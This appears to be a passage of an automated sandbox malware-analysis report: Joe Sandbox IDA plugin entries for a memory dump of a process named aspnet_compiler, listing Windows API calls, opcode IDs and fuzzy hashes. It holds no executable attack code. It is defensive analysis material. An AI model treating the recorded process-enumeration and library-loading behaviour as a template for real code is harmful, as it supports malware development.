                                                                                                                                                                                                                                                                  • Opcode ID: c564e2dac45e98255982b2f5b81f63d0ee060e8ba45c1b0e90e5d891c3d08d38
                                                                                                                                                                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c564e2dac45e98255982b2f5b81f63d0ee060e8ba45c1b0e90e5d891c3d08d38
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcmpmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1065087418-0
                                                                                                                                                                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1297977491-0
                                                                                                                                                                                                                                                                  • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                                                  • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2154303073-0
                                                                                                                                                                                                                                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3150196962-0
                                                                                                                                                                                                                                                                  • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                                                                                                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$PointerRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                                                                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3859505661-0
                                                                                                                                                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
